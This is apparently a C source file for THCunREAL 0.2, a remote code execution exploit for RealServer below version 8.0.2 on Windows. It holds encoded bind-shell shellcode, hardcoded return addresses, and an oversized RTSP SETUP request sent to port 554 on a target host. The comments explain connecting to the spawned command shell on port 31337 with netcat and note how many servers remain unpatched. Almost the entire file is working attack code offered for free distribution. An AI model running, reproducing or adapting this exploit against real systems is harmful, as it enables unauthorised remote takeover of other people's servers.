THCunREAL.c 6.1 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151
  1. /*****************************************************************************/
  2. /* THCunREAL 0.2 - Wind0wZ remote root exploit */
  3. /* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
  4. /* THC PUBLIC SOURCE MATERIALS */
  5. /* */
  6. /* The exploit can be freely distributed ! */
  7. /* */
  8. /* This is the much more reliable version of the Realserver < 8.0.2 exploit */
  9. /* Tested with different OSes and Realserver Versions */
  10. /* */
  11. /* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554 */
  12. /* i noticed that 99% of the probed machines are not up2date yet ! =;O) */
  13. /* */
  14. /* The shellcode is much shorter than the one in version 0.1 now and of */
  15. /* course offsetless ! The encoder in front of the exploit is needed coz the */
  16. /* shellcode has next to 0x00,0x0d,0x0a also to be 0x20 and 0xff free ! */
  17. /* */
  18. /* After successful exploitation of this bug, a commandshell should spawn on */
  19. /* TCP port 31337 ! Use netcat to connect to this port ! */
  20. /* */
  21. /* If there's no connectable port 31337, maybe it's blocked by a firewall ! */
  22. /* */
  23. /* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8 */
  24. /* runs on. I just know it's also exploitable on other OSs ! */
  25. /* So if u wanna exploit other platforms, try to get Realserver 8 and use */
  26. /* gdb to find out, how this can be exploited ! Good luck ! */
  27. /* */
  28. /* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib */
  29. /* */
  30. /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
  31. /* scut, stealth, zip, zilvio and the rest of the combo ...... */
  32. /*****************************************************************************/
  33. #include <stdio.h>
  34. #include <stdlib.h>
  35. #include <string.h>
  36. #include <winsock2.h>
  37. char w32portshell[] =
  38. "\x8b\xfa\x33\xc9\xb2\x35\x90\x90\x90\x66\x81\xc1\x38\x01\x83"
  39. "\xc7\x1a\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16\x4f\x5c"
  40. "\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1\x36\xc5"
  41. "\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71\x79\x79"
  42. "\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f\x05\x6c"
  43. "\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d\xb8\x6a"
  44. "\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29\x34\xcc"
  45. "\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce\x04\xfc"
  46. "\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4\xd7\xb1"
  47. "\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c\x25\x40"
  48. "\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25\x74\x3a"
  49. "\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc\x71\xb8"
  50. "\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78\x17\xb8"
  51. "\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30\xb5\x70"
  52. "\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca\xca\xbc"
  53. "\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2\x60\x6d"
  54. "\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62\xca\x60"
  55. "\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca\x60\xd1"
  56. "\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b\x50\x4d"
  57. "\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1\x62\x62"
  58. "\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65\xb8\x70"
  59. "\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66\x66\x60"
  60. "\xca\x60\xd9\x5f\xca\xca\x60\xd5";
  61. void usage();
  62. int main(int argc, char *argv[])
  63. {
  64. unsigned short realport=554;
  65. unsigned int sock,addr,i,rc;
  66. unsigned char exploit_buffer[4132];
  67. unsigned long retloc1,retloc2,retaddr;
  68. struct sockaddr_in mytcp;
  69. struct hostent * hp;
  70. WSADATA wsaData;
  71. printf("\nTHCunREAL v0.2 - Wind0wZ remote root sploit for Realserver < 8.0.2\n");
  72. printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
  73. if(argc<2)
  74. usage();
  75. retloc1 = 0x6235108c;
  76. retloc2 = 0x623514b6;
  77. retaddr = 0x62354f5e;
  78. memset(exploit_buffer,'Z',4131);
  79. memcpy(exploit_buffer,"SETUP /",7);
  80. *(unsigned long *)&exploit_buffer[4082] = retloc1;
  81. *(unsigned long *)&exploit_buffer[4086] = retloc2;
  82. memcpy(&exploit_buffer[7],w32portshell,strlen(w32portshell));
  83. *(unsigned long *)&exploit_buffer[4090] = retaddr;
  84. memcpy(&exploit_buffer[4094],"\x83\xc2\x19\x52\xc3",5);
  85. memcpy(&exploit_buffer[4099]," RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n",33);
  86. if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
  87. {
  88. printf("WSAStartup failed !\n");
  89. exit(-1);
  90. }
  91. hp = gethostbyname(argv[1]);
  92. if (!hp){
  93. addr = inet_addr(argv[1]);
  94. }
  95. if ((!hp) && (addr == INADDR_NONE) )
  96. {
  97. printf("Unable to resolve %s\n",argv[1]);
  98. exit(-1);
  99. }
  100. sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  101. if (!sock)
  102. {
  103. printf("socket() error...\n");
  104. exit(-1);
  105. }
  106. if (hp != NULL)
  107. memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
  108. else
  109. mytcp.sin_addr.s_addr = addr;
  110. if (hp)
  111. mytcp.sin_family = hp->h_addrtype;
  112. else
  113. mytcp.sin_family = AF_INET;
  114. mytcp.sin_port=htons(realport);
  115. rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
  116. if(rc==0)
  117. {
  118. send(sock,exploit_buffer,4131,0);
  119. printf("\nexploit send .... sleeping a while ....\n");
  120. Sleep(1000);
  121. printf("\nok ... now try to connect to port 31337 via netcat !\n");
  122. }
  123. else
  124. printf("can't connect to realserver port!\n");
  125. shutdown(sock,1);
  126. closesocket(sock);
  127. exit(0);
  128. }
  129. void usage()
  130. {
  131. printf("\nUsage: <Host>\n");
  132. exit(0);
  133. }